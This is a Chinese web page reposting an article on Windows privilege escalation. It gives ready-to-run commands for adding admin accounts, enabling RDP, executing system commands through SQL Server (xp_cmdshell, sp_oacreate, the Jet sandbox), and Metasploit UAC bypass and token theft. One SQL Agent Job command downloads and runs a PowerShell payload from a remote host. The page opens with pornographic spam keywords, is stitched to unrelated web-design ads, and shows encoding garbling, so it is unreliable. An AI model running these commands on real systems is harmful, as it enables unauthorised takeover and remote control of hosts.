日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側工具欄

新聞中心

這里有您想知道的互聯(lián)網營銷解決方案
Windows提權的幾種常用姿勢

本文轉載自微信公眾號「Bypass」,作者Bypass 。轉載本文請聯(lián)系Bypass公眾號。

創(chuàng)新互聯(lián)公司專業(yè)為企業(yè)提供大安網站建設、大安做網站、大安網站設計、大安網站制作等企業(yè)網站建設、網頁設計與制作、大安企業(yè)網站模板建站服務,10多年大安做網站經驗,不只是建網站,更提供有價值的思路和整體網絡服務。

當獲取主機權限時,我們總是希望可以將普通用戶提升為管理員用戶,以便獲得高權限完全控制目標主機。Windows常用的提權方式有:內核提權、數據庫提權、系統(tǒng)配置錯誤提權、組策略選擇項提權、Bypass UAC提權、令牌竊取提權等姿勢。

1. 內核溢出漏洞提權

由于目標系統(tǒng)沒有及時安裝補丁,攻擊者可以利用Windows系統(tǒng)內核溢出漏洞進行提權,輕易獲取system權限。

(1) 通過systeminfo比對KB編號,發(fā)現系統(tǒng)是否存在漏洞。

github項目地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester

(2) 找到對應漏洞的exp執(zhí)行,獲取system權限

github項目地址:https://github.com/SecWiki/windows-kernel-exploits

(3) 添加管理員

 
 
 
 
    
  
  
  
  
  1. net user 用戶名 密碼 /add
    2. 
  
  
  
  
  2. net localgroup Administrators 用戶名 /add
    3.

(4) 開啟遠程桌面

 
 
 
 
    
  
  
  
  
  1. # 開啟遠程
    2. 
  
  
  
  
  2. REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    3. 
  
  
  
  
  3. # 查詢遠程端口
    4. 
  
  
  
  
  4. REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
    5.

2. 數據庫提權

(1) MySQL提權

利用mysql的幾種提權方式,如udf提權、mof提權、啟動項提權等。

  • udf提權:通過創(chuàng)建用戶自定義函數,對mysql功能進行擴充,可以執(zhí)行系統(tǒng)任意命令,將mysql賬號root轉化為系統(tǒng)system權限。
  • mof提權:在windows平臺下,c:/windows/system32/wbem/mof/nullevt.mof 這個文件會每間隔一段時間(很短暫)就會以system權限執(zhí)行一次,所以,只要我們將我們先要做的事通過代碼存儲到這個mof文件中,就可以實現權限提升。
  • 啟動項提權:將后面腳本上傳到系統(tǒng)啟動目錄,當服務器重啟就會自動執(zhí)行該腳本,從而獲取系統(tǒng)權限。

(2) SQL Server 提權

利用SQL Sercer執(zhí)行系統(tǒng)命令的方式也有多種,比如xp_cmdshell、SP_OACREATE、沙盒、Agent Job、CLR來提權。

使用xp_cmdshell進行提權:

 
 
 
 
    
  
  
  
  
  1. # 啟用xp_cmdshell
    2. 
  
  
  
  
  2. EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE;
    3. 
  
  
  
  
  3. # 通過xp_cmdshell執(zhí)行系統(tǒng)命令
    4. 
  
  
  
  
  4. Exec master.dbo.xp_cmdshell 'whoami'
    5.

SP_OACREATE:

 
 
 
 
    
  
  
  
  
  1. # 開啟組件
    2. 
  
  
  
  
  2. EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;   
    3. 
  
  
  
  
  3. EXEC sp_configure 'show advanced options', 0;
    4. 
  
  
  
  
  4. # 執(zhí)行系統(tǒng)命令(無回顯)
    5. 
  
  
  
  
  5. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami'
    6.

通過沙盒執(zhí)行命令:

 
 
 
 
    
  
  
  
  
  1. # 開啟沙盒
    2. 
  
  
  
  
  2. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
    3. 
  
  
  
  
  3. # 利用jet.oledb執(zhí)行命令
    4. 
  
  
  
  
  4. select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')
    5.

通過Agent Job執(zhí)行命令:

修改開啟Ageent Job,執(zhí)行無回顯CobaltStrike生成powershell上線

 
 
 
 
    
  
  
  
  
  1. USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://192.168.214.129:80/a''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';
    2.

3. 系統(tǒng)配置錯誤提權

(1) 權限配置錯誤

如果管理員權限配置錯誤,將導致低權限用戶對高權限運行的文件擁有寫入權限,那么低權限用戶就可以替換成惡意后門文件,獲取系統(tǒng)權限。一般在啟動項、計劃任務,服務里查找錯誤配置,嘗試提權。

(2) 可信任服務路徑漏洞

(3) 不安全的注冊表權限配置

如果低權限用戶對程序路徑所對應的鍵值有寫權限,那么就可以控制這個服務,運行后門程序,從而獲取權限。

 
 
 
 
    
  
  
  
  
  1. # 存儲Windows服務有關的信息
    2. 
  
  
  
  
  2. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
    3. 
  
  
  
  
  3. # 服務對應的程序路徑存儲
    4. 
  
  
  
  
  4. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Vulnerable Service\服務名\ImagePath
    5. 
  
  
  
  
  5. 3.4 AlwaysInstallElevated
    6.

注冊表鍵AlwaysInstallElevated是一個策略設置項。windows允許低權限用戶以System權限運行安裝文件。如果啟用此策略設置項,那么任何權限用戶都能以NT AUTHORITY\SYSTEM權限來安裝惡意的MSI(Microsoft Windows Installer)文件。

4. 組策略選擇項提權

SYSVOL是域內的共享文件夾,用來存放登錄腳本、組策略腳本等信息。當域管理員通過組策略修改密碼時,在腳本中引入用戶密碼,就可能導致安全問題。

(1) 訪問SYSVOL共享文件夾,搜索包含“cpassword”的XML文件,獲取AES加密的密碼。

(2) 使用kali自帶的gpp-decrypt進行破解

5. Bypass UAC提權

UAC(User Account Control,用戶賬號控制),是微軟引入的一種安全機制。Bypass UAC提權,可以將管理員權限提升到system權限。

使用msf模塊:

 
 
 
 
    
  
  
  
  
  1. msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac 
    2. 
  
  
  
  
  2. meterpreter > getuid
    3. 
  
  
  
  
  3. meterpreter > getsystem
    4.

6. 令牌竊取提權

通過竊取令牌獲取管理員權限,在MSF中,可以使用incognito實現token竊取。

 
 
 
 
    
  
  
  
  
  1. meterpreter > use incognito           #進入incognito模塊
    2. 
  
  
  
  
  2. meterpreter > list_tokens -u          #列出令牌
    3. 
  
  
  
  
  3. meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"   #模擬令牌
    4.

文章名稱:Windows提權的幾種常用姿勢
轉載注明:http://m.5511xx.com/article/dhgescd.html